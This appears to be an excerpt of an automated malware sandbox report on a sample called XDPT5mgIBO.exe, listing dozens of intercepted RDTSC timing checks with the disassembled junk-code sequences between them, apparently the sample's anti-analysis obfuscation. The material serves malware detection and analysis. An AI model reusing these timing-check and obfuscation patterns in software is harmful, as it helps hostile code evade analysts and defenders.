                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93491 second address: A9349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnp 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5701D second address: A35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA3D4D82116h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FA3D4D82108h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D355Fh] 0x0000002e call 00007FA3D4D8210Fh 0x00000033 call 00007FA3D4D8210Dh 0x00000038 mov dword ptr [ebp+122D36CCh], ecx 0x0000003e pop edi 0x0000003f pop ecx 0x00000040 lea eax, dword ptr [ebp+12488E64h] 0x00000046 mov edx, dword ptr [ebp+122D2284h] 0x0000004c push eax 0x0000004d jmp 00007FA3D4D82114h 0x00000052 mov dword ptr [esp], eax 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FA3D4D82108h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f call dword ptr [ebp+122D38D1h] 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 pop edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57289 second address: A572B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575DE second address: A575E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575E4 second address: A575E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57696 second address: A576C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3D4D8210Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push edi 0x00000010 jmp 00007FA3D4D8210Eh 0x00000015 pop edi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576C7 second address: A576CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576CB second address: A576FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FA3D4D82112h 0x00000011 pop eax 0x00000012 and ch, FFFFFFB9h 0x00000015 mov edi, eax 0x00000017 push 8DD05BBCh 0x0000001c pushad 0x0000001d jbe 00007FA3D4D8210Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576FC second address: A57703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A578EC second address: A57912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FA3D4D82106h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B1F second address: A57B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B23 second address: A57B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B29 second address: A57B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnc 00007FA3D4C68E56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov cx, F61Bh 0x00000015 push 00000004h 0x00000017 mov di, D68Bh 0x0000001b nop 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4A second address: A57B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57B4E second address: A57B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A58046 second address: A5804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A581EB second address: A58205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA3D4C68E61h 0x0000000f jmp 00007FA3D4C68E5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9371D second address: A9374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA3D4D8210Ch 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FA3D4D82119h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A938F6 second address: A938FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9642A second address: A96438 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A96438 second address: A9643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9643E second address: A96442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A1368A second address: A13690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13690 second address: A13694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A13694 second address: A136C4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA3D4C68E56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3D4C68E64h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C4 second address: A136C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A136C8 second address: A136E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA3D4C68E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FA3D4C68E5Ch 0x00000015 jne 00007FA3D4C68E56h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9914B second address: A99150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D0 second address: A992D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A992D6 second address: A992DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD2D second address: A9FD33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD33 second address: A9FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FD39 second address: A9FD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9FE68 second address: A9FEAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jmp 00007FA3D4D82114h 0x00000015 popad 0x00000016 jne 00007FA3D4D82128h 0x0000001c push edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA3D4D82110h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0007 second address: AA0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4C68E5Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0018 second address: AA001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0182 second address: AA0193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FA3D4C68E5Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0193 second address: AA0198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA0198 second address: AA01A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02CA second address: AA02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA02DA second address: AA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA3D4C68E56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA288F second address: AA28B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D82119h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AA28B2 second address: AA28B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA667B second address: AA6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA6680 second address: AA6687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA6687 second address: AA668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA668D second address: AA669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FA3D4C68E56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C04 second address: AA5C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C08 second address: AA5C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C25 second address: AA5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82114h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5C3D second address: AA5C4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA5D95 second address: AA5D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA607A second address: AA607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA607E second address: AA60A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 jne 00007FA3D4D82106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9127 second address: AA9131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA3D4C68E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9131 second address: AA913F instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA913F second address: AA9148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA9148 second address: AA914E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AA914E second address: AA9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB2189 second address: AB218F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB218F second address: AB2193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0385 second address: AB038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB038B second address: AB038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0696 second address: AB069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB069C second address: AB06BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Eh 0x00000007 jmp 00007FA3D4C68E61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06BF second address: AB06CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06CF second address: AB06D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB06D5 second address: AB06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0D79 second address: AB0D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB0D7F second address: AB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA3D4D82106h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB18DC second address: AB1926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f popad 0x00000010 jmp 00007FA3D4C68E63h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA3D4C68E5Fh 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB1926 second address: AB192E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB192E second address: AB1937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB1937 second address: AB193D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5DF8 second address: AB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5DFE second address: AB5E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5A05 second address: AB5A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AB5A0B second address: AB5A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B2D second address: AC2B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA3D4C68E56h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B3A second address: AC2B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FA3D4D82106h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B53 second address: AC2B5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC2B5D second address: AC2B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC106E second address: AC1082 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA3D4D82106h 0x0000000e jp 00007FA3D4D82106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1507 second address: AC152E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA3D4C68E62h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC152E second address: AC1550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82117h 0x00000007 pushad 0x00000008 jno 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC17E6 second address: AC1804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E67h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1804 second address: AC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D82113h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA3D4D8213Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FA3D4D82106h 0x0000001c jg 00007FA3D4D82106h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1834 second address: AC1854 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA3D4C68E56h 0x00000008 jmp 00007FA3D4C68E63h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC19A4 second address: AC19B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FA3D4D82106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeRDTSC instruction interceptor: First address: AC1B23 second address: AC1B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
